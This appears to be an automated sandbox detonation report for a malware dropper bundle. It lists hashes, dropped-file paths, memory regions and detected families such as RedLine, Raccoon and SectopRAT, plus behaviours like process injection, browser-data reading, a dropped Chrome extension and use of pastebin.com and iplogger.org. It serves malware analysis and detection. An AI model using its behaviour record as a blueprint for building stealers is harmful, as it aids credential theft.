| MD5 | d7dc7c4758af4c44a161c8f8b6be3136 |
| SHA1 | b53863093d657af285d1f81e753fdcfb127aaa2a |
| SHA256 | 4942140f3d871f18b5a860cbaf2591bc6909ec4ae6301d50299cb3aa24865a6a |
| SHA512 | 103884eac6fb22f0acf9cd545eb4eec5972bee68b545e2b805cc97f1536bf1f2ac1e613d4e4c91927b787c8bf1e0ec67911cffce40564ad9e0c190b76d7a42e3 |
\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
memory/2420-124-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe
| MD5 | d165e339ef0c057e20eb61347d06d396 |
| SHA1 | cb508e60292616b22f2d7a5ab8f763e4c89cf448 |
| SHA256 | ef9dd026b0e39e2a1b0169c19446c98a83d4a2487633c109d0e54e40fb7463c8 |
| SHA512 | da6ac858c46cb1f8dd68f03e4550c645c85753d0de4dc0752494c737f4d433bb0e40a5a9de336e211c2e06aa9c6a30484f76baef6892d6a8860f558d1d90f580 |
C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/2952-151-0x0000000000090000-0x0000000000098000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-GR96V.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/2420-147-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1084-145-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2296-144-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-GR96V.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/872-159-0x0000000001380000-0x00000000013F0000-memory.dmp
memory/2924-162-0x0000000000030000-0x0000000000046000-memory.dmp
memory/2176-161-0x0000000000CB0000-0x0000000000D22000-memory.dmp
memory/2708-160-0x0000000000F00000-0x0000000000F70000-memory.dmp
memory/2924-165-0x0000000000360000-0x0000000000366000-memory.dmp
memory/2660-182-0x0000000002560000-0x00000000026BD000-memory.dmp
memory/1552-219-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1552-218-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1552-217-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1552-216-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1452-215-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1452-214-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1552-212-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1552-210-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1552-208-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1452-205-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1452-204-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1452-202-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1452-200-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1452-198-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1692-195-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1692-193-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1692-192-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1692-191-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1692-189-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1692-185-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1692-183-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1692-187-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2808-220-0x0000000000400000-0x000000000051C000-memory.dmp
memory/2808-229-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2808-228-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2808-227-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2808-226-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2808-224-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2660-230-0x00000000029D0000-0x0000000002A76000-memory.dmp
memory/2660-234-0x0000000002A80000-0x0000000002B13000-memory.dmp
memory/2660-232-0x0000000002A80000-0x0000000002B13000-memory.dmp
memory/2660-231-0x0000000002A80000-0x0000000002B13000-memory.dmp
memory/2644-235-0x0000000000400000-0x0000000002DAA000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
120s
Max time network
153s
Command Line
Signatures
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1144 set thread context of 4756 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe |
| PID 1768 set thread context of 852 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe |
| PID 4684 set thread context of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19150ee2be694c8a4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1993b3f72c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c06f159e0ec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19411ac950924ec3f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1969586bcbf58493.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19325eb008c0b950.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331540431966" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
